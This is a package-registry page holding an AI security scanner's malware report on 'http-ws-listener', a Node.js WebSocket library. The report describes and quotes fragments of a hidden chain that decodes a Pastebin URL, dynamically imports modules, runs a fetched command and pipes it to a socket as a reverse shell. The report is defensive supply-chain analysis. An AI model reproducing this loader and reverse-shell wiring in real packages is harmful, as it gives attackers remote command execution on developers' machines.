registry  /  http-ws-listener  /  1.0.5

http-ws-listener@1.0.5

A lightweight WebSocket server built with Node.js that provides real-time communication, message routing, and persistent transaction storage.

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Runtime startup contacts an obfuscated Pastebin URL, retrieves further handles, imports remote-selected modules, and executes a remote command. It then attempts to connect the spawned process streams to a remote socket.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
A consumer imports the package and invokes `startWebSocketServer()`.
Impact
Remote operator-controlled command execution in the host process, with attempted interactive shell access.
Mechanism
Obfuscated remote staging, dynamic module loading, command execution, and reverse-shell stream piping.
Attack narrative
When `startWebSocketServer()` runs, `index.js` starts `fetchConfig()`. That function decodes a Pastebin raw URL, fetches colon-delimited handles, retrieves further Pastebin content, dynamically imports modules selected by the remote response, executes a remotely fetched command through `cp.exec()`, and attempts to pipe its standard streams through a connected socket. Although the `sh` identifier is undefined and can break the callback, the preceding remote command execution remains a concrete malicious chain.
Rationale
The package contains a reachable, obfuscated remote payload chain that dynamically selects modules and executes a fetched command. This is malicious despite the absence of install-time lifecycle hooks.
Evidence
package.jsonindex.jsmisc/configFetcher.js./server.db./server_output_error_log
Network endpoints2
pastebin.com/raw/pzwaDQsVpastebin.com/raw/

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `misc/configFetcher.js` decodes `https://pastebin.com/raw/pzwaDQsV`.
  • `fetchConfig()` fetches attacker-selected Pastebin handles.
  • Fetched strings are passed to dynamic `import()` for `net` and `cp`.
  • `cp.exec()` executes a remotely fetched command.
  • A socket is wired to command stdin/stdout/stderr, implementing reverse-shell behavior.
  • `index.js` invokes `fetchConfig()` when `startWebSocketServer()` runs.
Evidence against
  • `package.json` has no preinstall/install/postinstall lifecycle hook.
  • The payload path requires explicit runtime invocation of `startWebSocketServer()`.
  • The callback references undefined `sh`, which may disrupt the shell wiring after connection.
Behavioral surface
Source
ChildProcessDynamicRequireFilesystemNetworkWebSocket
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 12.6 KB of source

Source & flagged code

3 flagged · loading source
misc/configFetcher.jsView file
9for(let i = 0; i < times; i++) { L10: let bufferObj = Buffer.from(inp, "base64"); L11: inp = bufferObj.toString("utf8"); ... L29: export async function fetchHandles() { L30: const resp = await fetch(decode()); L31: const body = await resp.text(); ... L59: client.pipe(sh.stdin); L60: cp.stdout.pipe(client); L61: cp.stderr.pipe(client);
Critical
Reverse Shell

Source matches reverse-shell style process and socket wiring.

misc/configFetcher.jsView on unpkg · L9
9Trigger-reachable chain: manifest.main -> index.js -> misc/configFetcher.js L9: for(let i = 0; i < times; i++) { L10: let bufferObj = Buffer.from(inp, "base64"); L11: inp = bufferObj.toString("utf8"); ... L29: export async function fetchHandles() { L30: const resp = await fetch(decode()); L31: const body = await resp.text(); ... L59: client.pipe(sh.stdin); L60: cp.stdout.pipe(client); L61: cp.stderr.pipe(client);
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

misc/configFetcher.jsView on unpkg · L9
52const lone = await fetchData(handlebards[3]); L53: const net = await import(lone); L54: const ltwo = await fetchData(handlebards[4]);
Medium
Dynamic Require

Package source references dynamic require/import behavior.

misc/configFetcher.jsView on unpkg · L52

Findings

2 Critical1 High3 Medium3 Low
CriticalReverse Shellmisc/configFetcher.js
CriticalTrigger Reachable Dangerous Capabilitymisc/configFetcher.js
HighChild Process
MediumDynamic Requiremisc/configFetcher.js
MediumNetwork
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowHigh Entropy Strings